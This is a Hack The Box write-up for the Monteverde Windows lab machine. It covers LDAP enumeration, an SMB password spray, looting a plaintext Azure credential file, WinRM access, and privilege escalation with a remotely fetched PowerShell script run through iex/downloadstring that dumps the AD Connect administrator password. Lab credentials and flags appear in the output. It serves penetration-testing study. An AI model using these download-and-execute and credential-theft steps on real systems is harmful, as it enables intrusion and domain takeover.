HTB Monteverde done
Monteverde¶
OS:¶
Windows
Technology:¶
IP Address:¶
10.10.10.172
Open ports:¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ cat 10.10.10.172_nmap_vulns.nmap| grep "tcp.*open"
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-11 11:08:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
56148/tcp open msrpc Microsoft Windows RPC
Users and pass:¶
From LDAP
Guest
AAD_987d7f2f57d2
Mike
SABatchJobs
svc-ata
svc-bexec
svc-netapp
Dimitris
Ray
Sally
---
From Azure
Username: mhope
Password: 4n0therD4y@n0th3r$
---
From Azure
Username: administrator
Password: d0m@in4dminyeah!
Nmap¶
─$ sudo nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.10.172_nmap_vulns 10.10.10.172
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-15 10:18 UTC
Nmap scan report for 10.10.10.172
Host is up (0.038s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-15 10:20:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
49853/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
| smb2-time:
| date: 2023-05-15T10:21:28
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 37.42 ms 10.10.14.1
2 37.85 ms 10.10.10.172
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 442.18 seconds
Add hostname to /etc/hosts¶
┌──(root㉿kali)-[~]
└─# echo "10.10.10.172 MEGABANK.LOCAL" >> /etc/hosts
Domain Enumerate¶
Download windapsearch¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ wget https://raw.githubusercontent.com/ropnop/windapsearch/master/windapsearch.py
--2023-05-15 10:57:18-- https://raw.githubusercontent.com/ropnop/windapsearch/master/windapsearch.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 32804 (32K) [text/plain]
Saving to: ‘windapsearch.py’
windapsearch.py 100%[==============================================>] 32.04K --.-KB/s in 0.04s
2023-05-15 10:57:19 (722 KB/s) - ‘windapsearch.py’ saved [32804/32804]
Enumerate the domain users¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ python windapsearch.py -u "" --dc-ip 10.10.10.172 -U --admin-objects | tee windapserch_dump
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.172
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=MEGABANK,DC=LOCAL
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[+] Found 10 users:
cn: Guest
cn: AAD_987d7f2f57d2
cn: Mike Hope
userPrincipalName: [email protected]
cn: SABatchJobs
userPrincipalName: [email protected]
cn: svc-ata
userPrincipalName: [email protected]
cn: svc-bexec
userPrincipalName: [email protected]
cn: svc-netapp
userPrincipalName: [email protected]
cn: Dimitris Galanos
userPrincipalName: [email protected]
cn: Ray O'Leary
userPrincipalName: [email protected]
cn: Sally Morgan
userPrincipalName: [email protected]
[+] Attempting to enumerate all admin (protected) objects
[+] Found 0 Admin Objects:
[*] Bye!
Get username via LDAP¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ cat windapsearch_dump | grep "cn" | awk '{print $2}' > windapsearch_username
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ cat windapsearch_username
Guest
AAD_987d7f2f57d2
Mike
SABatchJobs
svc-ata
svc-bexec
svc-netapp
Dimitris
Ray
Sally
Get username via LDAP (group: Remote Management Users)¶
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ python windapsearch.py -u "" --dc-ip 10.10.10.172 -U -m "Remote Management Users"
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.172
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=MEGABANK,DC=LOCAL
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[+] Found 10 users:
cn: Guest
cn: AAD_987d7f2f57d2
cn: Mike Hope
userPrincipalName: [email protected]
cn: SABatchJobs
userPrincipalName: [email protected]
cn: svc-ata
userPrincipalName: [email protected]
cn: svc-bexec
userPrincipalName: [email protected]
cn: svc-netapp
userPrincipalName: [email protected]
cn: Dimitris Galanos
userPrincipalName: [email protected]
cn: Ray O'Leary
userPrincipalName: [email protected]
cn: Sally Morgan
userPrincipalName: [email protected]
[+] Attempting to enumerate full DN for group: Remote Management Users
[+] Using DN: CN=Remote Management Users,CN=Builtin,DC=MEGABANK,DC=LOCAL
[+] Found 1 members:
b'CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL'
[*] Bye!
Enumerate domain information¶
We focus on line: [+] Account Lockout Threshold: None
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ enum4linux -a 10.10.10.172 | tee enum4linux_dump
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 15 13:57:39 2023
=========================================( Target Information )=========================================
Target ........... 10.10.10.172
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
...
[+] Password Info for Domain: MEGABANK
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
...
Foothold - crackmapexec¶
crackmapexc¶
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ crackmapexec smb 10.10.10.172 -d megabank -u windapsearch_username -p english-basic.txt | grep -v "STATUS_LOGON_FAILURE"
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:megabank) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] megabank\SABatchJobs:SABatchJobs
smbmap - list all shares for user SABatchJobs¶
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.10.10.172
[+] IP: 10.10.10.172:445 Name: MEGABANK.LOCAL
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLY
smbmap - find and download files (xlsx|xls|docx|doc|txt|xml|powershell|kdbx)¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.10.10.172 -A '(xlsx|xls|docx|doc|txt|xml|powershell|kdbx)' -R
[+] IP: 10.10.10.172:445 Name: MEGABANK.LOCAL
[+] Starting search for files matching '(xlsx|xls|docx|doc|txt|xml|powershell|kdbx)' on share azure_uploads.
[+] Starting search for files matching '(xlsx|xls|docx|doc|txt|xml|powershell|kdbx)' on share IPC$.
[+] Starting search for files matching '(xlsx|xls|docx|doc|txt|xml|powershell|kdbx)' on share NETLOGON.
[+] Starting search for files matching '(xlsx|xls|docx|doc|txt|xml|powershell|kdbx)' on share SYSVOL.
[+] Starting search for files matching '(xlsx|xls|docx|doc|txt|xml|powershell|kdbx)' on share users$.
[+] Match found! Downloading: users$\mhope\azure.xml
Read file azure.xml¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ cat 10.10.10.172-users_mhope_azure.xml
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
Read flag: user.txt¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir
Directory: C:\Users\mhope\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/15/2023 1:54 AM 34 user.txt
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
8798fb5a0f7e1da54974bae568756ca8
*Evil-WinRM* PS C:\Users\mhope\Desktop>
Escalation¶
Check my username - MEGABANK\Azure Admins¶
*Evil-WinRM* PS C:\Users\mhope\Desktop> whoami -all
USER INFORMATION
----------------
User Name SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Create and edit script: azuread_decrypt_msol.ps1¶
Script from here --> https://gist.githubusercontent.com/xpn/0dc393e944d8733e3c63023968583545/raw/d45633c954ee3d40be1bff82648750f516cd3b80/azuread_decrypt_msol.ps1
- Remove the '@_xpn_' from this line: Write-Host “AD Connect Sync Credential Extract POC (@xpn)\n”
- The connection string should be $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=LocalHost;Database=ADSync;Trusted_Connection=True;"
- This line has the wrong type of quote marks. It needs the double quotes: add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll’
Execute script¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.172 - - [16/May/2023 11:02:54] "GET /exploit.ps1 HTTP/1.1" 200 -
*Evil-WinRM* PS C:\Users\mhope\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.13/exploit.ps1')
AD Connect Sync Credential Extract POC ()
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
*Evil-WinRM* PS C:\Users\mhope\Desktop>
Read flag: root.txt¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Monteverde]
└─$ evil-winrm -i 10.10.10.172 -u administrator -p 'd0m@in4dminyeah!'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/15/2023 1:54 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
1419a81ac378ab70ddd4fa88501459cd
References¶
https://blog.xpnsec.com/azuread-connect-for-redteam/?ref=t3chnocat.com https://gist.githubusercontent.com/xpn/0dc393e944d8733e3c63023968583545/raw/d45633c954ee3d40be1bff82648750f516cd3b80/azuread_decrypt_msol.ps1